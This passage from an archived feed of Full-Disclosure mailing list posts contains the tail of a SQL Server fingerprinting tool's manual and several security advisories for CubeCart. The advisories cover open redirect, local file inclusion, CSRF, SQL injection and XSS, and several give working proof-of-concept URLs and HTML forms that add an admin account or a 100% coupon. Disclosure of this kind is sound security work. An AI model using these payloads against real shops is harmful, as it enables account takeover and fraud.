         0010   00 01 02 00 21 00 01 03 00 22 00 00 04 00 22 00<br />
         0020   01 ff 0a 00 09 e3 00 00 01 00 01<br />
<br />
    As demonstrated above, there are four bytes following the &quot;TERMINATOR&quot;<br />
    (*0xFF* at the OFFSET *34*), and they represent the version for<br />
    Microsoft SQL Server 2008 SP1 (*10.0.2531*):<br />
<br />
    1) OFFSET *35* represents the Major Version (0x0a = *10*)<br />
    2) OFFSET *36* represents the Minor Version (0x00 = *0*)<br />
    3) OFFSETS *37*/*38* represent the Build Version ([0x09*256]+0xe3 =<br />
    *2531*)<br />
<br />
        *NOTE: no authentication and gratuitous information.*<br />
<br />
  MULTIPLE SQL SERVER INSTANCES WARNING<br />
    Warns the availability of multiple instances (&quot;Default Instances&quot; as<br />
    well as &quot;Named Instances&quot;). This information is collected and parsed by<br />
    &quot;STEP 1&quot; and used and validated by &quot;STEP 3&quot; (see &quot;Fingerprinting Steps&quot;<br />
    for further information).<br />
<br />
        *NOTE: Only in &quot;verbose&quot; mode (see &quot;OPTIONS&quot; for further<br />
        information).*<br />
<br />
  DYNAMIC SQL SERVER TCP PORT WARNING<br />
    Warns the availability of multiple instances (&quot;Default Instances&quot; as<br />
    well as &quot;Named Instances&quot;) running on &quot;TDS&quot; dynamic communication<br />
    port(s). This information is collected and parsed by &quot;STEP 1&quot; and used<br />
    and validated by &quot;STEP 3&quot; (see &quot;Fingerprinting Steps&quot; for further<br />
    information).<br />
<br />
        *NOTE: Only in &quot;verbose&quot; mode (see &quot;OPTIONS&quot; for further<br />
        information).*<br />
<br />
  DEFAULT SQL SERVER TCP PORT WARNING<br />
    Warns the availability of &quot;Default Instances&quot; running on &quot;TDS&quot; default<br />
    communication port(s) . This information is collected and parsed by<br />
    &quot;STEP 1&quot; and used and validated by &quot;STEP 3&quot; (see &quot;Fingerprinting Steps&quot;<br />
    for further information).<br />
<br />
        *NOTE: Only in &quot;verbose&quot; mode (see &quot;OPTIONS&quot; for further<br />
        information).*<br />
<br />
  MOST LIKELY WARNING<br />
    ADD DESCRIPTION HERE<br />
<br />
OPTIONS<br />
    &quot;-d,--debug&quot; (default OFF)<br />
        Configure the debug mode, giving much more information details about<br />
        the fingerprinting tasks.<br />
<br />
    &quot;-f,--fingerprintdb FILE&quot; (default &quot;ESF.db&quot;)<br />
        Configure an optional file for SQL Fingerprint Database.<br />
<br />
    &quot;-t,--timeout NUM&quot; (default 30)<br />
        Configure a specific connection timeout (seconds), allowing ESF.pl<br />
        to wait until close the connection.<br />
<br />
    &quot;-T,--TIMEOUT NUM&quot; (default 5)<br />
        Configure a specific timeout (seconds), allowing ESF.pl to wait<br />
        until execute the next subroutine.<br />
<br />
    &quot;-v,--verbose&quot; (default OFF)<br />
        Configure the verbose mode, giving information details about the<br />
        fingerprinting tasks.<br />
<br />
    &quot;-m,--manpage&quot;<br />
        Display the manual page embedded in ESF.pl, being the manual page in<br />
        POD (Plain Old Documentation) format.<br />
<br />
    &quot;-h,-?,--help&quot;<br />
        Display the help and usage message.<br />
<br />
DEPENDENCIES<br />
    Digest::MD5(3)<br />
        See &quot;Getopt::Long's Perl Documentation&quot; for further information.<br />
<br />
    Getopt::Long(3)<br />
        See &quot;Getopt::Long's Perl Documentation&quot; for further information.<br />
<br />
    IO::Socket(3)<br />
        See &quot;IO::Socket's Perl Documentation&quot; for further information.<br />
<br />
    Pod::Usage(3)<br />
        See &quot;Pod::Usage's Perl Documentation&quot; for further information.<br />
<br />
    POSIX(1)<br />
        See &quot;POSIX's Perl Documentation&quot; for further information.<br />
<br />
    Switch(3)<br />
        See &quot;Switch's Perl Documentation&quot; for further information.<br />
<br />
    PERL(1) v5.10.1 or v5.12.4<br />
        ESF.pl has been widely tested under Perl v5.10.1 (Ubuntu 10.04 LTS)<br />
        and Perl v5.12.4 (OS X Mountain Lion). Due to this, ESF.pl requires<br />
        one of the mentioned versions to be executed. The following tests<br />
        will be performed to ensure its capabilities:<br />
<br />
         BEGIN {<br />
            my $subname = (caller(0))[3];<br />
            eval(&quot;require 5.012004;&quot;);<br />
            eval(&quot;require 5.010001;&quot;) if $@;<br />
            die &quot;$subname\{\}: Unsupported Perl version ($]).\n&quot; if $@;<br />
         }<br />
<br />
            *NOTE: If you are confident that your Perl version is capable to<br />
            execute the ESF.pl, please, remove the above tests and send<br />
            feedback to the author*.<br />
<br />
        See &quot;PERL's Perl Documentation&quot; for further information.<br />
<br />
SEE ALSO<br />
    Digest::MD5(3), IO::Socket(3), Getopt::Long(3), Pod::Usage(3), POSIX(1),<br />
    Socket(3), Switch(3), PERL(1), [RFC793]<br />
    [<a href="http://www.ietf.org/rfc/rfc793.txt"  rel="nofollow">www.ietf.org</a>], [RFC768]<br />
    [<a href="http://www.ietf.org/rfc/rfc768.txt"  rel="nofollow">www.ietf.org</a>], TDS<br />
    [<a href="http://msdn.microsoft.com/en-us/library/dd304523.aspx"  rel="nofollow">msdn.microsoft.com</a>], SSRP<br />
    [<a href="http://msdn.microsoft.com/en-us/library/cc219703.aspx"  rel="nofollow">msdn.microsoft.com</a>], SQLPing &amp;<br />
    SQLVer Tools [<a href="http://www.sqlsecurity.com/downloads"  rel="nofollow">www.sqlsecurity.com</a>]<br />
<br />
HISTORY<br />
    2008<br />
        Private Release (Late 2008)<br />
<br />
    2009<br />
        H2HC Talk (November 28)<br />
<br />
    2010<br />
        MSSQLFP BETA-3 (January 5)<br />
<br />
        MSSQLFP BETA-4 (January 18)<br />
<br />
        ESF 1.00.0006 (February 10)<br />
<br />
        ESF 1.10.101008/CTP (October 8)<br />
<br />
    2012<br />
        ESF 1.12.120115/RC0 (January 15)<br />
<br />
BUGS AND LIMITATIONS<br />
    Report ESF.pl bugs and limitations directly to the author.<br />
<br />
AUTHOR<br />
    Nelson Brito &lt;mailto:nbrito@sekure.org&gt;.<br />
<br />
COPYRIGHT<br />
    Copyright(c) 2010-2012 Nelson Brito. All rights reserved worldwide.<br />
<br />
    Exploit Next Generation++ Technology and/or other noted Exploit Next<br />
    Generation++ and/or ENG++ related products contained herein are<br />
    registered trademarks or trademarks of Nelson Brito. Any other<br />
    non-Exploit Next Generation++ related products, registered and/or<br />
    unregistered trademarks contained herein is only by reference and are<br />
    the sole property of their respective owners.<br />
<br />
    *Exploit Next Generation++ Technology*, innovating since 2010.<br />
<br />
LICENSE<br />
    This program is free software: you can redistribute it and/or modify it<br />
    under the terms of the *GNU General Public License* as published by the<br />
    Free Software Foundation, either version 3 of the License, or (at your<br />
    option) any later version.<br />
<br />
    You should have received a copy of the *GNU General Public License*<br />
    along with this program. If not, see [<a href="http://www.gnu.org/licenses/"  rel="nofollow">www.gnu.org</a>].<br />
<br />
DISCLAIMER OF WARRANTY<br />
    This program is distributed in the hope that it will be useful, but<br />
    WITHOUT ANY WARRANTY; without even the implied warranty of<br />
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *GNU<br />
    General Public License* for more details.<br />
<br />
[Download and Source Code]<br />
For immediately download, please, go to:<br />
	• [<a href="http://code.google.com/p/sql-fingerprint-next-generation/"  rel="nofollow">code.google.com</a>]<br />
<br />
Atenciosamente / Best regards / Saludos.<br />
<br />
Nelson Brito<br />
[<a href="http://about.me/nbrito"  rel="nofollow">about.me</a>]<br />
<br />
&quot;Quemadmodum gladius neminem occidit, occidentis telum est.&quot; (Epistulae morales ad Lucilium, Lucius Annaeus Seneca)<br />
<br />
Fingerprint: 1983 7E8E D6C9 CAF8 4B4F A8C9 A36D FC5B 4FFC 316C<br />
<br />
#!/bin/sh -- # -*- perl -*-<br />
eval 'exec `which perl` -x -S $0 ${1+&quot;$@&quot;} ;'<br />
	if 0;<br />
{(($^O=~/^[M]*$32/i)&amp;&amp;($0=~s!.*\\!!))||($0=~s!^.*/!!)};<br />
<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Nelson Brito</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:42:02 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698125,1698125#msg-1698125</guid>
            <title>[Full-disclosure] CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698125,1698125#msg-1698125</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 4.4.6 and lower versions contain a flaw that allows a remote<br />
cross site redirection attack. This flaw exists because the<br />
application does not properly sanitise the parameters, &quot;r&quot; and<br />
&quot;redir&quot;.  This allows an attacker to create a specially crafted URL,<br />
that if clicked, would redirect a victim from the intended legitimate<br />
web site to an arbitrary web site of the attacker's choice.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
4.4.6 and lower<br />
<br />
<br />
5. Affected URLs and Parameters<br />
<br />
/index.php (r parameter)<br />
/index.php (redir parameter)<br />
<br />
/index.php?_g=sw&amp;r=//yehg.net/<br />
/index.php?_a=login&amp;redir=//yehg.net<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 4.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported latest latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-06-22: CubeCart 4.x in End-of-Support/Maintenance circle<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_open_url_redirection"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
CubeCart Bug-Fix Announcement:<br />
[<a href="http://forums.cubecart.com/topic/45456-cubecart-447-released/"  rel="nofollow">forums.cubecart.com</a>]<br />
CubeCart4 End-of-Life Announcement:<br />
[<a href="http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/"  rel="nofollow">forums.cubecart.com</a>]<br />
<br />
#yehg [2012-12-24]<br />
	<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:36:10 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698124,1698124#msg-1698124</guid>
            <title>[Full-disclosure] CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698124,1698124#msg-1698124</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 4.x and 5.x versions are vulnerable to Setup Re-installation<br />
Privilege Escalation.<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 4.x and 5.x versions contain a flaw that does not remove<br />
set-up installation directory or warn users of the existence of set-up<br />
installation directory.  This allows an attacker to re-install the<br />
application, gain administrator access and do malicious things such as<br />
uploading malicious shell script to compromise the application server.<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
CubeCart 4.x and 5.x<br />
<br />
5. Affected URL<br />
<br />
N.A<br />
<br />
6. SOLUTION/WORKAROUND<br />
<br />
The vendor has chosen not to fix the issue.<br />
Workaround is to remove setup directory after installation.<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-03-24: Vulnerability Reported<br />
2012-12-24: Vulnerability disclosed<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4x5x%5D_setup_re-install-priv-esclate"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
	<br />
#yehg [2012-12-24]<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:36:10 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698117,1698117#msg-1698117</guid>
            <title>[Full-disclosure] CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698117,1698117#msg-1698117</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 4.4.6 and lower versions are vulnerable to Local File Inclusion.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 4.4.6 and lower versions contain a flaw that may allow a<br />
remote attacker to execute arbitrary commands or code. The issue is<br />
due to the '/admin.php' script not properly sanitizing user input,<br />
specifically directory traversal style attacks (e.g., ../../) supplied<br />
to the 'loc' parameter. This may allow an attacker to include a file<br />
from the targeted host that contains arbitrary commands or code that<br />
will be executed by the vulnerable script. Such attacks are limited<br />
due to the script only calling files already on the target host. In<br />
addition, this flaw can potentially be used to disclose the contents<br />
of any file on the system accessible by the web server.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
4.4.6 and lower<br />
<br />
<br />
5. Affected URL and Parameter<br />
<br />
/admin.php (loc parameter)<br />
/admin.php?_g=filemanager/language&amp;loc=/../../../public_ftp/uploads/hack.inc.php<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 4.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_lfi"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
CubeCart Bug-Fix Announcement:<br />
[<a href="http://forums.cubecart.com/topic/45456-cubecart-447-released/"  rel="nofollow">forums.cubecart.com</a>]<br />
CubeCart4 End-of-Life Announcement:<br />
[<a href="http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/"  rel="nofollow">forums.cubecart.com</a>]<br />
	<br />
#yehg [2012-12-24]<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:32:12 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698116,1698116#msg-1698116</guid>
            <title>[Full-disclosure] CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698116,1698116#msg-1698116</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Request<br />
Forgery (CSRF).<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
CubeCart 4.4.6 and and lower versions contain a flaw that allows a<br />
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw<br />
exists because the application does not require multiple steps or<br />
explicit confirmation for sensitive transactions for majority of<br />
administrator functions such as adding new user, assigning user to<br />
administrative privilege. By using a crafted URL, an attacker may<br />
trick the victim into visiting to his web page to take advantage of<br />
the trust relationship between the authenticated victim and the<br />
application. Such an attack could trick the victim into executing<br />
arbitrary commands in the context of their session with the<br />
application, without further prompting or verification.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
4.4.6 and lower<br />
<br />
<br />
5. Proof-of-Concept<br />
<br />
////////////////////////////////////////////////////////////////////////////////////<br />
Add Admin User<br />
==================<br />
    &lt;form action=&quot;[<a href="http://localhost/admin.php?_g=adminusers/administrators&quot"  rel="nofollow">localhost</a>];<br />
method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;hacker&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;adminUsername&quot; value=&quot;hacker&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;hacker&amp;#64;yehg&amp;#46;net&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;adminPassword&quot; value=&quot;h&amp;#64;ck3er&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;adminPassword&amp;#95;verify&quot;<br />
value=&quot;h&amp;#64;ck3er&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;isSuper&quot; value=&quot;&amp;#45;&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;notes&quot; value=&quot;&amp;#13;&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;adminId&quot; value=&quot;&amp;#13;&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;Submit&quot; value=&quot;Add&amp;#32;User&quot; /&gt;<br />
      &lt;input type=&quot;submit&quot; value=&quot;Submit form&quot; /&gt;<br />
    &lt;/form&gt;<br />
<br />
Add Coupon<br />
==============<br />
    &lt;form action=&quot;[<a href="http://localhost/admin.php?_g=products/coupons&quot"  rel="nofollow">localhost</a>]; method=&quot;POST&quot;&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;code&quot; value=&quot;HACKER&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;discount&amp;#95;percent&quot; value=&quot;100&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;discount&amp;#95;price&quot; value=&quot;&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;expires&quot; value=&quot;3000&amp;#47;12&amp;#47;30&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;allowed&amp;#95;uses&quot; value=&quot;0&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;count&quot; value=&quot;0&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;desc&quot; value=&quot;0&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;&quot; /&gt;<br />
      &lt;input type=&quot;hidden&quot; name=&quot;Submit&quot; value=&quot;Edit&amp;#32;Coupon&quot; /&gt;<br />
      &lt;input type=&quot;submit&quot; value=&quot;Submit form&quot; /&gt;<br />
    &lt;/form&gt;<br />
////////////////////////////////////////////////////////////////////////	<br />
<br />
	<br />
6. SOLUTION<br />
<br />
The CubeCart 4.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_csrf"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
CubeCart Bug-Fix Announcement:<br />
[<a href="http://forums.cubecart.com/topic/45456-cubecart-447-released/"  rel="nofollow">forums.cubecart.com</a>]<br />
	<br />
#yehg [2012-12-24]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:32:12 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698115,1698115#msg-1698115</guid>
            <title>[Full-disclosure] CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698115,1698115#msg-1698115</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
The CubeCart 4.4.6 and lower versions are vulnerable to SQL Injection.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Multiple parameters are not properly sanitized, which allows attacker<br />
to conduct  SQL Injection attack. This could an attacker to inject or<br />
manipulate SQL queries in the back-end database, allowing for the<br />
manipulation or disclosure of arbitrary data.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
4.4.6 and lower<br />
<br />
<br />
5. Affected URLs and Parameters<br />
<br />
/admin.php (active parameter)<br />
/admin.php (cat_id parameter)<br />
/admin.php (orderCol parameter)<br />
/admin.php (orderDir parameter)<br />
<br />
<br />
6. SOLUTION<br />
<br />
The CubeCart 4.x version family is no longer maintained by the vendor.<br />
Upgrade to the currently supported latest CubeCart version - 5.x.<br />
<br />
<br />
7. VENDOR<br />
<br />
CubeCart Development Team<br />
[<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle<br />
2012-12-24: Vulnerability disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_sqli"  rel="nofollow">yehg.net</a>]<br />
CubeCart Home Page: [<a href="http://cubecart.com/"  rel="nofollow">cubecart.com</a>]<br />
CubeCart Bug-Fix Announcement:<br />
[<a href="http://forums.cubecart.com/topic/45456-cubecart-447-released/"  rel="nofollow">forums.cubecart.com</a>]<br />
CubeCart4 End-of-Life Announcement:<br />
[<a href="http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/"  rel="nofollow">forums.cubecart.com</a>]<br />
	<br />
#yehg [2012-12-24]<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Mon, 24 Dec 2012 20:32:12 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698114,1698114#msg-1698114</guid>
            <title>[Full-disclosure] CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698114,1698114#msg-1698114</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Scripting.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
CubeCart is an &quot;out of the box&quot; ecommerce shopping cart software<br />
solution which has been written to run on servers that have PHP &amp;<br />
MySQL support. With CubeCart you can quickly setup a powerful online<br />
store which can be used to sell digital or tangible products to new<br />
and existing customers all over the world.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Multiple parameters are not properly sanitized, which allows attacker<br />
to conduct Cross Site Scripting attack. This may allow an attacker to<br />
create a specially crafted URL that would execute arbitrary script<br />
code in a victim's browser.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
4.4.6 and lower<br />
<br />
<br />
5. Affected URLs and Parameters<br />
<br />
/admin.php (countiesPage parameter)<br />
/admin.php (countriesPage parameter)<br />
/admin.php (dStart parameter)<br />
/admin.php (edit parameter)<br />
/admin.php (email parameter)<br />
/admin.php (FCKeditor parameter)<br />
/admin.php (gc%5Bmax%5D parameter)<br />
/admin.php (gc%5Bmin%5D parameter)<br />
/admin.php (gc%5BproductCode%5D parameter)<br />
/admin.php (gc%5Bweight%5D parameter)<br />
/admin.php (gc[max] parameter)<br />
/admin.php (gc[min] parameter)<br />
/admin.php (gc[productCode] parameter)<br />
/admin.php (gc[weight] parameter)<br />
/admin.php (loc]<br />
